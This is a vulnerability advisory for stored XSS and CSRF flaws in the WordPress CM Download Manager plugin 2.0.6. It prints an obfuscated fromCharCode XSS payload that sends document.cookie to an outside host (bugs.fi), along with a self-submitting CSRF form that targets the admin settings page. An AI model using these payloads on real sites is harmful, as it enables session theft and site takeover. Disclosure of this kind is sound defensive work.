WordPress CM Download Manager 2.0.6 XSS / CSRF

2014.12.04
Credit: Henri Salo
Risk: Medium
Local: No
Remote: Yes


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Product: WordPress plugin cm-download-manager Plugin page: https://wordpress.org/plugins/cm-download-manager/ Vendor: CreativeMindsSolutions http://cminds.com/ Vulnerability Type: CWE-79: Cross-site scripting Vulnerable Versions: 2.0.6 and below Fixed Version: 2.0.7 Solution Status: Fixed by Vendor Vendor Notification: 2014-11-27 Public Disclosure: 2014-12-02 CVE Reference: N/A. Only assigned for CSRF Criticality: Low Vulnerability details: CM Download Manager plugin for WordPress contains a flaw that allows a stored cross-site scripting (XSS) attack. This flaw exists because the /wp-admin/admin.php script does not validate input to the 'addons_title' POST parameter before returning it to users. This allows an authenticated remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Root cause: The software incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to authenticated users. Proof-of-concept: Insert following code to CM Downloads -> Settings -> "Downloads listing title" field with CSRF attack. <script>var foo = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 62, 110, 101, 119, 32, 73, 109, 97, 103, 101, 40, 41, 46, 115, 114, 99, 61, 34, 104, 116, 116, 112, 58, 47, 47, 98, 117, 103, 115, 46, 102, 105, 47, 99, 111, 111, 107, 105, 101, 46, 112, 104, 112, 63, 105, 100, 61, 34, 43, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 111, 111, 107, 105, 101, 59, 60, 47, 115, 99, 114, 105, 112, 116, 62);document.write(foo);</script> - --------------- Product: WordPress plugin cm-download-manager Plugin page: https://wordpress.org/plugins/cm-download-manager/ Vendor: CreativeMindsSolutions http://cminds.com/ Vulnerability Type: CWE-352: Cross-Site Request Forgery Vulnerable Versions: 2.0.6 and below Fixed Version: 2.0.7 Solution Status: Fixed by Vendor Vendor Notification: 2014-11-27 Public Disclosure: 2014-12-02 CVE Reference: CVE-2014-9129 Criticality: Low Vulnerability details: CM Download Manager plugin for WordPress contains a flaw on the CMDM_admin_settings page as HTTP requests to /wp-admin/admin.php do not require multiple steps, explicit confirmation, or a unique token when performing sensitive actions. By tricking authenticated user into following a specially crafted link, a context-dependent attacker can perform a CSRF attack causing the victim to insert and execute arbitrary script code. Root cause: The web application does not sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request. Proof-of-concept: <html><body><h3>https://example.org/wp-admin/admin.php?page=CMDM_admin_settings</h3> <form id="f1" method="POST" action="https://example.com/wp-admin/admin.php?page=CMDM_admin_settings"> <table><input type="text" name="addons_title" value="XSS"></table></form> <script type="text/javascript">document.getElementById("f1").submit();</script> </body></html> Notes: Other pages and/or parameters are also possibly insecure (not tested). Suggested to do a proper security audit for their software. Vendor did not mention security fix or CVE in ChangeLog even it was discussed several times. References below. Cross-site scripting: http://cwe.mitre.org/data/definitions/79.html https://scapsync.com/cwe/CWE-79 https://en.wikipedia.org/wiki/Cross-site_scripting Cross-Site Request Forgery: http://cwe.mitre.org/data/definitions/352.html https://scapsync.com/cwe/CWE-352 https://en.wikipedia.org/wiki/Cross-site_request_forgery - --- Henri Salo -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlR96QIACgkQXf6hBi6kbk8peQCgtWgwrqs7ahsAw30Ndnu70N7/ l98An1m+MqJ7xJ8+VcPbMxo72i1Xs2oT =bUVi -----END PGP SIGNATURE-----

References:

http://cxsecurity.com/issue/WLB-2014110141


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top